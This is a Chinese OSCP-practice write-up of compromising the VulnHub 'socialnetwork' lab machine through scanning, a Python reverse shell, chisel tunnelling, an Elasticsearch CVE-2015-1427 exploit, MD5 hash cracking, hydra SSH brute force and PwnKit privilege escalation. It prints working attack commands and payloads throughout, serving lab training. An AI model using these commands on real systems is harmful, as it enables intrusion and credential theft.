从今天起,正式开始靶机实战部分,坚持每天一台,欢迎大家监督
0-前言
打靶实战思路主要参考OSCP | 教材小结
对于教材内容不熟悉的同学可以参考OSCP | 教材笔记汇总下载
在靶机实战中每一步操作涉及教材内容的,我都会标注章节号,遇到不熟悉的部分随时回看教材笔记
1-环境搭建
靶机下载地址:
https://www.vulnhub.com/entry/boredhackerblog-social-network,454/kali镜像:
kali-linux-2024.2-virtualbox-amd64虚拟机环境:
Oracle VM VirtualBox 7.0网络:
kali和靶机都选“仅主机(Host-Only)网络”先启动kali,再启动靶机kali的IP是192.168.56.101靶机的IP是192.168.56.102
2-靶机实战
2-1-扫描枚举
端口扫描,命令参考“OSCP | 信息收集”章节的“6.3 主动信息收集”
sudo nmap -p 1-65535 192.168.56.102Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 02:06 EDTNmap scan report for 192.168.56.102Host is up (0.00028s latency).Not shown: 65533 closed tcp ports (reset)PORT STATE SERVICEopen sshopen upnpMAC Address: 08:00:27:40:AC:CA (Oracle VirtualBox virtual NIC)Nmap done: 1 IP address (1 host up) scanned in 14.48 seconds
发现22和5000端口开放,服务枚举,命令参考“OSCP | 信息收集”章节的“6.3 主动信息收集”
sudo nmap -p22,5000 -sT -A 192.168.56.102Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-11 02:08 EDTNmap scan report for 192.168.56.102Host is up (0.00034s latency).PORT STATE SERVICE VERSIONopen ssh OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)ssh-hostkey:1024 cc:53:20:b8:10:db:52:5f:16:02:bc:ee:57:22:80:e1 (DSA)2048 01:50:f6:1f:32:e8:0d:fc:48:38:3e:c8:1b:ac:20:02 (RSA)256 3b:ae:9a:bd:cb:ff:8f:54:64:32:ec:bf:38:fd:fe:6b (ECDSA)256 77:4e:8b:20:73:52:a4:ee:93:1d:b3:85:f2:25:d7:55 (ED25519)open http Werkzeug httpd 0.14.1 (Python 2.7.15): Leave a message: Werkzeug/0.14.1 Python/2.7.15MAC Address: 08:00:27:40:AC:CA (Oracle VirtualBox virtual NIC)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed portDevice type: general purposeRunning: Linux 3.X|4.XOS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4OS details: Linux 3.2 - 4.9Network Distance: 1 hopService Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTEHOP RTT ADDRESS1 0.34 ms 192.168.56.102OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 21.19 seconds
22端口为SSH服务,版本是OpenSSH 6.6p1,搜索可利用漏洞无果
5000端口是HTTP服务,版本是Werkzeug,是基于python的微博应用,可以进行web路径拆解,命令参考“OSCP | WEB攻击简介”章节的“8.2.3 目录枚举”
gobuster dir -u http://192.168.56.102:5000 -w /usr/share/wordlists/dirb/common.txt -t 5===============================================================Gobuster v3.6by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[] Url: http://192.168.56.102:5000[] Method: GET[] Threads: 5[] Wordlist: /usr/share/wordlists/dirb/common.txt[] Negative Status codes: 404[] User Agent: gobuster/3.6[] Timeout: 10s===============================================================Starting gobuster in directory enumeration mode===============================================================/admin (Status: 200) [Size: 401]Progress: 4614 / 4615 (99.98%)===============================================================Finished===============================================================
发现/admin目录
2-2-漏洞利用
访问http://192.168.56.102:5000/admin,发现可以执行python代码,尝试python反弹shell
使用https://revshells.com生成payload
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.101",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")页面执行payload,kali本地监听443端口,获得shell
查看本地文件,发现Dockerfile,疑似docker环境
nc -lvnp 443lsDockerfile main.py requirements.txt templates
进一步判断是不是docker环境
cat Dockerfilels /.dockerenvcat /proc/1/cgroup
发现docker相关配置,确实是docker环境,需要做逃逸获得宿主机权限
查看ip地址
ip add1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN00:00:00:00:00:00 brd 00:00:00:00:00:00inet 127.0.0.1/8 scope host lovalid_lft forever preferred_lft forever4: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP02:42:ac:11:00:02 brd ff:ff:ff:ff:ff:ffinet 172.17.0.2/16 brd 172.17.255.255 scope global eth0valid_lft forever preferred_lft forever
发现172段地址,开展内网主机发现,发现机器上没有扫描工具,使用ping命令探测存活主机
for i in $(seq 1 10); do ping -c 1 172.17.0.$i; done--- 172.17.0.1 ping statistics ---1 packets transmitted, 1 packets received, 0% packet lossround-trip min/avg/max = 0.077/0.077/0.077 msPING 172.17.0.2 (172.17.0.2): 56 data bytes64 bytes from 172.17.0.2: seq=0 ttl=64 time=0.138 ms--- 172.17.0.2 ping statistics ---1 packets transmitted, 1 packets received, 0% packet lossround-trip min/avg/max = 0.138/0.138/0.138 msPING 172.17.0.3 (172.17.0.3): 56 data bytes64 bytes from 172.17.0.3: seq=0 ttl=64 time=0.026 ms--- 172.17.0.3 ping statistics ---1 packets transmitted, 1 packets received, 0% packet lossround-trip min/avg/max = 0.026/0.026/0.026 msPING 172.17.0.4 (172.17.0.4): 56 data bytes--- 172.17.0.4 ping statistics ---1 packets transmitted, 0 packets received, 100% packet lossPING 172.17.0.5 (172.17.0.5): 56 data bytes
发现3台可以ping通,上传代理工具chisel,命令参考“OSCP | 隧道过DPI”章节的“19.1.2 使用chisel搭建HTTP隧道”
kali上开启http服务和chisel监听
python3 -m http.server 80Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...chisel server --port 8080 --reverse2024/07/11 02:55:57 server: Reverse tunnelling enabled2024/07/11 02:55:57 server: Fingerprint D5w60b7wpqc/nLfUBoUOSySgP/fpFZ9jEloSpS/3ts4=2024/07/11 02:55:57 server: Listening on http://0.0.0.0:8080
靶机上下载并执行
wget http://192.168.56.101/chisel -O /tmp/chisel && chmod +x /tmp/chiselConnecting to 192.168.56.101 (192.168.56.101:80)chisel 100% |*******************************| 8452k 0:00:00 ETA/tmp/chisel client 192.168.56.101:8080 R:socks2024/07/11 06:59:47 client: Connecting to ws://192.168.56.101:80802024/07/11 06:59:47 client: Connected (Latency 387.922µs)
kali上修改proxychains的配置文件
sudo vi /etc/proxychains4.confsocks5 127.0.0.1 1080
通过代理进行扫描172段,命令参考“OSCP | 信息收集”章节的“6.3 主动信息收集”
proxychains4 nc -nv -w 1 -z 172.17.0.1 1-65535proxychains4 nc -nv -w 1 -z 172.17.0.2 1-65535proxychains4 nc -nv -w 1 -z 172.17.0.3 1-65535[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:23 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:22 ... OK(UNKNOWN) [172.17.0.1] 22 (ssh) open : Operation now in progress[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:21 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:20 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:5001 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:5000 ... OK(UNKNOWN) [172.17.0.1] 5000 (?) open : Operation now in progress[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.1:4999 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK(UNKNOWN) [172.17.0.2] 9200 (?) open : Operation now in progress[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9199 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5002 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5001 <--socket error or timeout![proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:5000 ... OK(UNKNOWN) [172.17.0.3] 5000 (?) open : Operation now in progress[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.3:4999 <--socket error or timeout!
发现172.17.0.1的22和5000开放、发现172.17.0.2的9200开放、发现172.17.0.3的5000开放
发现172.17.0.1和172.17.0.3和192.168.56.102服务基本一致,关注172.17.0.2的9200
proxychains4 curl http://172.17.0.2:9200[] config file found: /etc/proxychains4.conf[] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[] DLL init: proxychains-ng 4.17[] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK{"status" : 200,"name" : "Agent Axis","cluster_name" : "elasticsearch","version" : {"number" : "1.4.2","build_hash" : "927caff6f05403e936c20bf4529f144f0c89fd8c","build_timestamp" : "2014-12-16T14:11:12Z","build_snapshot" : false,"lucene_version" : "4.10.2"},"tagline" : "You Know, for Search"}
发现是elasticsearch 1.4.2,查找漏洞信息,命令参考“OSCP | 已知漏洞利用”章节的“12.3.2 SearchSploit”
searchsploit elasticsearch---------------------------------Exploit Title | Path---------------------------------ElasticSearch - Remote Code Execution | linux/remote/36337.pyElasticSearch - Remote Code Execution | multiple/webapps/33370.htmlElasticSearch - Search Groovy Sandbox Bypass (Metasploit) | java/remote/36415.rbElasticsearch - StackOverflow DoS | multiple/dos/51787.txtElasticSearch 1.6.0 - Arbitrary File Download | linux/webapps/38383.pyElasticSearch 7.13.3 - Memory disclosure | multiple/webapps/50149.pyElasticSearch < 1.4.5 / < 1.5.2 - Directory Traversal | php/webapps/37054.pyElasticSearch Dynamic Script - Arbitrary Java Execution (Metasploit) | java/remote/33588.rbElasticsearch ECE 7.13.3 - Anonymous Database Dump | multiple/webapps/50152.py---------------------------------Shellcodes: No Resultssearchsploit -m linux/remote/36337.pyExploit: ElasticSearch - Remote Code ExecutionURL: https://www.exploit-db.com/exploits/36337Path: /usr/share/exploitdb/exploits/linux/remote/36337.pyCodes: CVE-2015-1427, OSVDB-118239Verified: TrueFile Type: Python script, Unicode text, UTF-8 text executableCopied to: /home/kali/36337.py
查看exp代码是python2编写,对172.17.0.2运行exp
proxychains4 python2 36337.py 172.17.0.2[] config file found: /etc/proxychains4.conf[] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4[] DLL init: proxychains-ng 4.17▓█████ ██▓ ▄▄▄ ██████ ▄▄▄█████▓ ██▓ ▄████▄ ██████ ██░ ██ ▓█████ ██▓ ██▓▓█ ▀ ▓██▒ ▒████▄ ▒██ ▒ ▓ ██▒ ▓▒▓██▒▒██▀ ▀█ ▒██ ▒ ▓██░ ██▒▓█ ▀ ▓██▒ ▓██▒▒███ ▒██░ ▒██ ▀█▄ ░ ▓██▄ ▒ ▓██░ ▒░▒██▒▒▓█ ▄ ░ ▓██▄ ▒██▀▀██░▒███ ▒██░ ▒██░▒▓█ ▄ ▒██░ ░██▄▄▄▄██ ▒ ██▒░ ▓██▓ ░ ░██░▒▓▓▄ ▄██▒ ▒ ██▒░▓█ ░██ ▒▓█ ▄ ▒██░ ▒██░░▒████▒░██████▒▓█ ▓██▒▒██████▒▒ ▒██▒ ░ ░██░▒ ▓███▀ ░▒██████▒▒░▓█▒░██▓░▒████▒░██████▒░██████▒░░ ▒░ ░░ ▒░▓ ░▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒ ░░ ░▓ ░ ░▒ ▒ ░▒ ▒▓▒ ▒ ░ ▒ ░░▒░▒░░ ▒░ ░░ ▒░▓ ░░ ▒░▓ ░░ ░ ░░ ░ ▒ ░ ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ░ ░ ▒ ░ ░▒ ░ ░ ▒ ░▒░ ░ ░ ░ ░░ ░ ▒ ░░ ░ ▒ ░░ ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░Exploit for ElasticSearch , CVE-2015-1427 Version: 20150309.1{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something~$ id[] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OKuid=0(root) gid=0(root) groups=0(root)~$
获得shell,可以执行命令,查看文件发现依然是docker容器
ls -al[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OKtotal 27172drwxr-xr-x 37 root root 4096 Jul 11 08:18 .drwxr-xr-x 37 root root 4096 Jul 11 08:18 ..-rwxr-xr-x 1 root root 0 Jul 11 08:18 .dockerenvdrwxr-xr-x 2 root root 4096 Oct 11 2018 bindrwxr-xr-x 2 root root 4096 Jun 14 2018 bootdrwxr-xr-x 5 root root 360 Jul 11 08:18 devdrwxr-xr-x 7 root root 4096 Jul 11 08:18 elasticsearch-rw-r--r-- 1 root root 27734207 May 16 2018 elasticsearch-1.4.2.tar.gzdrwxr-xr-x 69 root root 4096 Jul 11 08:18 etcdrwxr-xr-x 2 root root 4096 Jun 14 2018 homedrwxr-xr-x 12 root root 4096 Oct 29 2018 libdrwxr-xr-x 2 root root 4096 Oct 11 2018 lib64-rwxrwxr-x 1 root root 262 Oct 29 2018 main.shdrwxr-xr-x 2 root root 4096 Oct 11 2018 mediadrwxr-xr-x 2 root root 4096 Oct 11 2018 mntdrwxr-xr-x 2 root root 4096 Oct 11 2018 opt-rw-rw-r-- 1 root root 287 Oct 29 2018 passwordsdr-xr-xr-x 88 root root 0 Jul 11 08:18 procdrwx------ 2 root root 4096 Oct 11 2018 rootdrwxr-xr-x 4 root root 4096 Oct 29 2018 rundrwxr-xr-x 2 root root 4096 Oct 29 2018 sbindrwxr-xr-x 2 root root 4096 Oct 11 2018 srvdr-xr-xr-x 13 root root 0 Jul 11 08:18 sysdrwxrwxrwt 4 root root 4096 Jul 11 08:18 tmpdrwxr-xr-x 16 root root 4096 Oct 29 2018 usrdrwxr-xr-x 14 root root 4096 Oct 29 2018 var~$ cat /proc/1/cgroup[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OK11:hugetlb:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca86710:perf_event:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8679:blkio:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8678:freezer:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8677:devices:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8676:memory:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8675:cpuacct:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8674:cpu:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8673:cpuset:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca8672:name=systemd:/docker/789a71def4a017081de8e955302fe533ad690b326c6b495e21ea98c3f83ca867
但在根目录下发现passwords文件,cat看内容
cat passwords[proxychains] Strict chain ... 127.0.0.1:1080 ... 172.17.0.2:9200 ... OKFormat: number,number,number,number,lowercase,lowercase,lowercase,lowercaseExample: 1234abcdjohn:3f8184a7343664553fcb5337a3138814test:861f194e9d6118f3d942a72be3e51749admin:670c3bbc209a18dde5446e5e6c1f1d5broot:b3d34352fc26117979deabdf1b9b6354jane:5c158b60ed97c723b673529b8a3cf72b
发现密码hash,格式疑似md5,使用在线破解平台进行破解https://crackstation.net/
3f8184a7343664553fcb5337a3138814 md5 1337hack861f194e9d6118f3d942a72be3e51749 md5 1234test670c3bbc209a18dde5446e5e6c1f1d5b md5 1111passb3d34352fc26117979deabdf1b9b6354 md5 1234pass5c158b60ed97c723b673529b8a3cf72b md5 1234jane
做成字典name.txt
johntestadminrootjane
password.txt
1337hack1234test1111pass1234pass1234jane
暴力破解191.168.56.102的SSH服务,命令参考“OSCP | 密码攻击”章节的“15.1.1 SSH和RDP”
hydra -L name.txt -P password.txt -s 22 ssh://192.168.56.102Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2024-07-11 04:53:32[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task[DATA] attacking ssh://192.168.56.102:22/[22][ssh] host: 192.168.56.102 login: john password: 1337hack1 of 1 target successfully completed, 1 valid password foundHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2024-07-11 04:53:36
SSH登录192.168.56.102
ssh john@192.168.56.102密码输入1337hack
获得主机shell,这次不是docker容器了
3-权限提升
3-1-提权枚举
上传linpeas.sh运行,,命令参考“OSCP | Linux提权”章节的“17.1.3 自动枚举”
cd /tmpwget http://192.168.56.101/linpeas.shchmod +x ./linpeas.sh./linpeas.sh
══════════════════════════════╣ System Information ╠══════════════════════════════╚════════════════════╝╔══════════╣ Operative system╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#kernel-exploitsLinux version 3.13.0-24-generic (buildd@panlong) (gcc version 4.8.2 (Ubuntu 4.8.2-19ubuntu1) ) #46-Ubuntu SMP Thu Apr 10 19:11:08 UTC 2014Distributor ID: UbuntuDescription: Ubuntu 14.04 LTSRelease: 14.04Codename: trusty
内核版本低,查看内核漏洞信息
Executing Linux Exploit Suggesterhttps://github.com/mzet-/linux-exploit-suggester[CVE-2016-5195] dirtycowDetails: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},[ ubuntu=16.04|14.04|12.04 ]Download URL: https://www.exploit-db.com/download/40611Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[CVE-2016-5195] dirtycow 2Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetailsExposure: highly probableTags: debian=7|8,RHEL=5|6|7,[ ubuntu=14.04|12.04 ],ubuntu=10.04{kernel:2.6.32-21-generic},ubuntu=16.04{kernel:4.4.0-21-generic}Download URL: https://www.exploit-db.com/download/40839: https://www.exploit-db.com/download/40847Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh[CVE-2015-1328] overlayfsDetails: http://seclists.org/oss-sec/2015/q2/717Exposure: highly probableTags: [ ubuntu=(12.04|14.04){kernel:3.13.0-(2|3|4|5)*-generic} ],ubuntu=(14.10|15.04){kernel:3.(13|16).0-*-generic}Download URL: https://www.exploit-db.com/download/37292[CVE-2021-4034] PwnKitDetails: https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txtExposure: probableTags: [ ubuntu=10|11|12|13|14|15|16|17|18|19|20|21 ],debian=7|8|9|10|11,fedora,manjaroDownload URL: https://codeload.github.com/berdav/CVE-2021-4034/zip/main
3-2-提权利用
可以逐一尝试,这里我使用的是[CVE-2021-4034] PwnKit(https://github.com/ly4k/PwnKit)
wget http://192.168.56.101/PwnKitchmod +x ./PwnKitiduid=0(root) gid=0(root) groups=0(root),1001(john)
打完收工
方法不止一种,各位小伙伴可以多多尝试
如有好的靶机欢迎后台留言推荐
或者小伙伴有靶机实战笔记也可后台发我分享哈
坚持自律做最好的自己
原文始发于微信公众号(高级红队专家):OSCP实战靶机 | socialnetwork
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论